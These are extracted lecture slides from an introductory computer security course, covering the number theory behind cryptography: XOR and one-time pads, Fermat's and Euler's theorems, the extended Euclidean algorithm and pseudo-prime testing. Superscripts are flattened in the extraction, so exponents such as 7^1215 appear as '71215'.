![Page 111: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/111.jpg)
Fermat’s theorem
For p = 13 the value is always 1 by the time the powergets to 12
Sometimes the value gets to 1 earlier
Lengths of runs are always numbers that divide evenlyinto 12
A value of a for which the whole row is needed is calleda generator . 2, 6, 7, and 11 are generators.
CS3235 - Hugh Anderson’s notes. Page number: 110
![Page 112: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/112.jpg)
Summary of topics
In this section, we introduced “Cryptographers favorites”
CS3235 - Hugh Anderson’s notes. Page number: 111
![Page 113: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/113.jpg)
Further study
• The Laws of Cryptography with Java Codehttp://www.cs.utsa.edu/˜wagner/lawsbookcolor/laws.pdf
CS3235 - Hugh Anderson’s notes. Page number: 112
![Page 114: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/114.jpg)
Chapter 3
Lecture 3 - Preliminaries
CS3235 - Hugh Anderson’s notes. Page number: 113
![Page 115: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/115.jpg)
Overheads and notes
You can find all sorts of stuff looking in
http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/
CS3235 - Hugh Anderson’s notes. Page number: 114
![Page 116: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/116.jpg)
Question box
If you have any questions, feel free to place them in thequestion box...
Or stick your hand up...
Or...
CS3235 - Hugh Anderson’s notes. Page number: 115
![Page 117: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/117.jpg)
Last session
• Finish context
• Math preliminaries
– XOR– Logarithms– Fields and groups
CS3235 - Hugh Anderson’s notes. Page number: 116
![Page 118: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/118.jpg)
Recap - exclusive-or
Law XOR-1:The cryptographer’s favorite function is Exclusive-Or .
Message A B C
m 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
K(m) = m⊕ k 0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
K(m) R ’ z
CS3235 - Hugh Anderson’s notes. Page number: 117
![Page 119: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/119.jpg)
Exclusive-Or
K(m) R ’ z
0 1 0 1 0 0 1 0 0 0 1 0 0 1 1 1 0 1 1 1 1 0 1 0 . . .
Key= k 0 0 0 1 0 0 1 1 0 1 1 0 0 1 0 1 0 0 1 1 1 0 0 1 . . .
m = K(m)⊕ k 0 1 0 0 0 0 0 1 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 1 . . .
Message A B C
If the bit-stream for the key k is random, and not known toan eavesdropper, then this is the most secure system. It isknown as a one-time-pad.
CS3235 - Hugh Anderson’s notes. Page number: 118
![Page 120: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/120.jpg)
Another diagram
XPKi[P]P
X(Plaintext)(Plaintext)
KiKi
(Compare with previous representations).
CS3235 - Hugh Anderson’s notes. Page number: 119
![Page 121: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/121.jpg)
Logarithms
Law LOG-1:The cryptographer’s favorite logarithm is log base 2 .
y = logb x is the same as by = x
b(logb x) = x
Logarithm is inverse of exponential.
CS3235 - Hugh Anderson’s notes. Page number: 120
![Page 122: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/122.jpg)
Groups
A group is
a set of group elements with a binary operation
Law GROUP-1:The cryptographer’s favorite group is the integers mod n ,
Zn.
CS3235 - Hugh Anderson’s notes. Page number: 121
![Page 123: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/123.jpg)
Fields
A field has two operations
+, with elements forming a commutative group. ∗, with elements\0 forming another group,
Law FIELD-1:The cryptographer’s favorite field is the integers mod p ,
denoted Zp , where p is a prime number.
Law FIELD-2:The cryptographer’s other favorite field is GF(2n).
CS3235 - Hugh Anderson’s notes. Page number: 122
![Page 124: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/124.jpg)
This session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 123
![Page 125: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/125.jpg)
This session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 124
![Page 126: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/126.jpg)
Fermat’s theorem
Theorem (Fermat): If p is a prime and a is any non-zero number less than p, then
ap−1 mod p = 1
CS3235 - Hugh Anderson’s notes. Page number: 125
![Page 127: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/127.jpg)
Fermat’s theorem, p = 13
p a a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12
13 2 2 4 8 3 6 12 11 9 5 10 7 1
13 3 3 9 1 3 9 1 3 9 1 3 9 1
13 4 4 3 12 9 10 1 4 3 12 9 10 1
13 5 5 12 8 1 5 12 8 1 5 12 8 1
13 6 6 10 8 9 2 12 7 3 5 4 11 1
13 7 7 10 5 9 11 12 6 3 8 4 2 1
13 8 8 12 5 1 8 12 5 1 8 12 5 1
13 9 9 3 1 9 3 1 9 3 1 9 3 1
13 10 10 9 12 3 4 1 10 9 12 3 4 1
13 11 11 4 5 3 7 12 2 9 8 10 6 1
13 12 12 1 12 1 12 1 12 1 12 1 12 1
CS3235 - Hugh Anderson’s notes. Page number: 126
![Page 128: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/128.jpg)
Fermat’s theorem, p = 13
Lengths of runs are always numbers that divide evenlyinto 12
A value of a for which the whole row is needed is calleda generator . 2, 6, 7, and 11 are generators.
CS3235 - Hugh Anderson’s notes. Page number: 127
![Page 129: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/129.jpg)
An interesting observation..
Because a to a power mod p always starts repeating afterthe power reaches p− 1, you can do this:
ax mod p = ax mod (p−1) mod p.
Thus modulo p in the expression requires modulo p − 1 inthe exponent. For p = 13 as above, then
a29 mod 13 = a29 mod 12 mod 13 = a5 mod 13.
CS3235 - Hugh Anderson’s notes. Page number: 128
![Page 130: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/130.jpg)
Another example
result = 71215 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 129
![Page 131: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/131.jpg)
Another example
result=
62247027506732273704655645590797926890623986483292191309020787710924
86991072740587065198907810173838994978267934813009677708927826601313
55777365361484044783800851222817392261341421370762400507026834564501
61478881858016233581815507729190060733863810985820998417753776670372
86814739670120315712396914000184822340352355906455155667534102473964
53541377412583676260706359331048403293779053704648771069764131865422
62299505280557584280574185802694213299802280179325494560628948940739
34448228464915119714116869895958794732024285742690180232449402567101
05083114967356334295809219455711191131246974627173111242792554453321
16504914530077241996189357298508605206780120789880835525222341940514
58556732086842042388893209157040799864871901064991230860288657545878
54838031902109935110264503891544145872580747830622294066978047059698
08888224976779404912792017633095411318555938776800816778624695807909\
49705787192596277127796303487781814106147375370904627195995589087276
8469943 mod 13 = 5
CS3235 - Hugh Anderson’s notes. Page number: 130
![Page 132: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/132.jpg)
How did I work that out?
I used bc
An arbitrary precision calculator language
CS3235 - Hugh Anderson’s notes. Page number: 131
![Page 133: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/133.jpg)
Another example
result = 71215 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 132
![Page 134: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/134.jpg)
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 133
![Page 135: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/135.jpg)
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
= 73 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 134
![Page 136: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/136.jpg)
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
= 73 mod 13
= 343 mod 13
CS3235 - Hugh Anderson’s notes. Page number: 135
![Page 137: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/137.jpg)
Another example
result = 71215 mod 13
= 71215 mod 12 mod 13
= 73 mod 13
= 343 mod 13
= 5
CS3235 - Hugh Anderson’s notes. Page number: 136
![Page 138: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/138.jpg)
Summary
We can do BIG NUMBER maths without calculating bignumbers.
CS3235 - Hugh Anderson’s notes. Page number: 137
![Page 139: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/139.jpg)
This session
• Math preliminaries
– Fermat’s little theorem– Euler
CS3235 - Hugh Anderson’s notes. Page number: 138
![Page 140: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/140.jpg)
Euler
The Swiss mathematician Leonhard Euler (1707-1783) dis-covered a generalization of Fermat’s Theorem which willlater be useful in the discussion of the RSA cryptosystem.
CS3235 - Hugh Anderson’s notes. Page number: 139
![Page 141: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/141.jpg)
Euler’s theorem
Theorem (Euler): If n is any positive integer and a is anypositive integer less than n with no divisors in common withn, then
aφ(n) mod n = 1,
where φ(n) is the Euler phi function:
φ(n) = n(1− 1/p1) . . . (1− 1/pm),
and p1, . . . , pm are all the prime numbers that divide evenlyinto n, including n itself in case it is a prime.
CS3235 - Hugh Anderson’s notes. Page number: 140
![Page 142: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/142.jpg)
Special case 1
If n is a prime, then using the formula,
φ(n) = n(1− 1/n) = n(n− 1
n) = n− 1
Fermat’s result is a special case of Euler’s.
aφ(n) mod n = an−1 mod n = 1
CS3235 - Hugh Anderson’s notes. Page number: 141
![Page 143: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/143.jpg)
Special case 2
Another special case needed for RSA comes when themodulus is a product of two primes: n = pq. Then
φ(n) = n(1− 1/p)(1− 1/q) = (p− 1)(q − 1)
CS3235 - Hugh Anderson’s notes. Page number: 142
![Page 144: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/144.jpg)
Special case 2
a(p−1)(q−1) mod pq = 1
• assuming a has no divisors in common with pq
• and p and q are primes
CS3235 - Hugh Anderson’s notes. Page number: 143
![Page 145: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/145.jpg)
Euler: n = 15 and φ(n) = 8
a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12 a13 a14
2 4 8 1 2 4 8 1 2 4 8 1 2 4
3 9 12 6 3 9 12 6 3 9 12 6 3 9
4 1 4 1 4 1 4 1 4 1 4 1 4 1
5 10 5 10 5 10 5 10 5 10 5 10 5 10
6 6 6 6 6 6 6 6 6 6 6 6 6 6
7 4 13 1 7 4 13 1 7 4 13 1 7 4
8 4 2 1 8 4 2 1 8 4 2 1 8 4
9 6 9 6 9 6 9 6 9 6 9 6 9 6
10 10 10 10 10 10 10 10 10 10 10 10 10 10
11 1 11 1 11 1 11 1 11 1 11 1 11 1
12 9 3 6 12 9 3 6 12 9 3 6 12 9
13 4 7 1 13 4 7 1 13 4 7 1 13 4
14 1 14 1 14 1 14 1 14 1 14 1 14 1
CS3235 - Hugh Anderson’s notes. Page number: 144
![Page 146: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/146.jpg)
Table
Table illustrates Euler’s theorem for n = 15 = 3 · 5, with
φ(15) = 15 · (1− 1/3) · (1− 1/5) = (3− 1) · (5− 1) = 8
Notice here that a 1 is reached when the power is 8, butonly for numbers with no divisors in common with 15.
For other base numbers, the value never gets to 1.
CS3235 - Hugh Anderson’s notes. Page number: 145
![Page 147: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/147.jpg)
Euler
Arithmetic in the exponent is taken mod φ(n), so that, if ahas no divisors in common with n,
ax mod n = ax mod φ(n) mod n.
If n = 15 as above, then φ(n) = 8, and if neither 3 nor 5divides evenly into a, then φ(n) = 8. Thus for example,
a28 mod 15 = a28mod 8 mod 15 = a4 mod 15.
CS3235 - Hugh Anderson’s notes. Page number: 146
![Page 148: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/148.jpg)
Before we leave Euler...
We are interested in...
Large prime numbers (p, q)
Their product n = pq
The Euler phi function φ(n) = (p− 1)(q − 1)
CS3235 - Hugh Anderson’s notes. Page number: 147
![Page 149: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/149.jpg)
Before we leave Euler...
In a similar fashion to before we can do BIG numberarithmetic easily
Consider also the ease of multiplying, and difficulty offactoring...
CS3235 - Hugh Anderson’s notes. Page number: 148
![Page 150: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/150.jpg)
Before we leave Euler...
29*37=?
CS3235 - Hugh Anderson’s notes. Page number: 149
![Page 151: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/151.jpg)
The Euclidean algorithm
Multiplicative inverse is not intuitive and requires sometheory to compute.
a−1 can be computed efficiently using the extended Eu-clidean algorithm
Law GCD-1:The cryptographer’s first and oldest favorite algorithm is
the extended Euclidean algorithm , which computes the greatestcommon divisor of two positive integers a and b and also sup-plies integers x and y such that x*a + y*b = gcd(a, b) .
CS3235 - Hugh Anderson’s notes. Page number: 150
![Page 152: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/152.jpg)
Finding GCD
• For the gcd of 819 and 462,
– factor the numbers as:∗ 819 = 3 · 3 · 7 · 13∗ 462 = 2 · 3 · 7 · 11
– gcd is 21 = 3 · 7
But there is no efficient algorithm to factor integers.
CS3235 - Hugh Anderson’s notes. Page number: 151
![Page 153: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/153.jpg)
The Euclidean algorithm
1. Repeatedly divide the larger one by the smaller , and
2. Write larger = smaller * quotient + remainder
3. Repeat using the two numbers “smaller ” and “remainder ”.
4. When you get a 0 remainder , then you have the gcd ofthe original two numbers.
CS3235 - Hugh Anderson’s notes. Page number: 152
![Page 154: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/154.jpg)
Example
819 = 462 · 1 + 357 (Step 0)
462 = 357 · 1 + 105 (Step 1)
357 = 105 · 3 + 42 (Step 2)
105 = 42 · 2 + 21 (Step 3, so GCD = 21)
42 = 21 · 2 + 0 (Step 4)
CS3235 - Hugh Anderson’s notes. Page number: 153
![Page 155: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/155.jpg)
The extended Euclidean algorithm
Given the two positive integers 819 and 462, the extendedEuclidean algorithm finds unique integers a and b so that
a · 819 + b · 462 = gcd(819, 462) = 21
In this case,(−9) · 819 + 16 · 462 = 21
(See notes...)
How does this give us a mechanism to calculate the mul-tiplicative inverse of an element?
CS3235 - Hugh Anderson’s notes. Page number: 154
![Page 156: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/156.jpg)
The extended Euclidean algorithm
x ∗ a + y ∗ p = gcd(x, y)
Now - if p is a prime, then gcd(x, y) = 1, and so
x ∗ a + y ∗ p = 1
In the field Zp, this indicates that x ∗ a = 1, and so x = a−1.
The extended Euclidean algorithm has given us a mecha-nism to calculate the multiplicative inverse of an element.
CS3235 - Hugh Anderson’s notes. Page number: 155
![Page 157: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/157.jpg)
Fast integer exponentiation
Law EXP-1:Many cryptosystems in modern cryptography depend on
a fast algorithm to perform integer exponentiation.
Examples in notes... not so important, just nice to know itcan be done.
CS3235 - Hugh Anderson’s notes. Page number: 156
![Page 158: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/158.jpg)
Back to primes
For 2500 years mathematicians studied prime numbers justbecause they were interesting, without any idea they wouldhave practical applications. Possible real-world uses:
1. Sometimes... a prime number of ball bearings arrangedin a bearing, to cut down on periodic wear (also gearteeth).
2. Possibly... the 13 and 17-year periodic emergence of ci-cadas may be due to coevolution with predators (that lostand became extinct).
CS3235 - Hugh Anderson’s notes. Page number: 157
![Page 159: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/159.jpg)
Since 1976
Now finally, in cryptography, prime numbers have come intotheir own.
Law PRIME-1:A source of large random prime integers is an essential
part of many current cryptosystems.
CS3235 - Hugh Anderson’s notes. Page number: 158
![Page 160: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/160.jpg)
Checking for primes
It is hard to check that an integer is “certainly” prime,but...
It is easy to check that an integer is “probably” prime.
Tests to check if a number is probably prime are calledpseudo-prime tests.
CS3235 - Hugh Anderson’s notes. Page number: 159
![Page 161: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/161.jpg)
Prime check
Start with a property of a prime number, such as Fer-mat’s Theorem, mentioned in the previous chapter
if p is a prime and a is any non-zero number less than p,then ap−1 mod p = 1.
If one can find a number a for which Fermat’s Theoremdoes not hold, then the number p in the theorem is defi-nitely not a prime.
If the theorem holds, then p is called a pseudo-prime withrespect to a, and it might actually be a prime.
CS3235 - Hugh Anderson’s notes. Page number: 160
![Page 162: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/162.jpg)
Prime check
So the simplest possible pseudo-prime test would just takea small value of a, say 2 or 3, and check if Fermat’s Theoremis true.
Simple Pseudo-prime Test: If a very large randominteger p (100 decimal digits or more) is not divisibleby a small prime, and if 3p−1 mod p = 1, then the num-ber is prime except for a vanishingly small probability,which one can ignore.
CS3235 - Hugh Anderson’s notes. Page number: 161
![Page 163: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/163.jpg)
Prime check - 1105,1729
One could just repeat the test for other integers besides3 as the base, but unfortunately there are non-primes(called Carmichael numbers) that satisfy Fermat’s the-orem for all values of a even though they are not prime.
Chances of a mistake less than 10−41, in practice usebetter tests
Law PRIME-2:Just one simple pseudo-prime test is enough to test that a
very large random integer is probably prime.
CS3235 - Hugh Anderson’s notes. Page number: 162
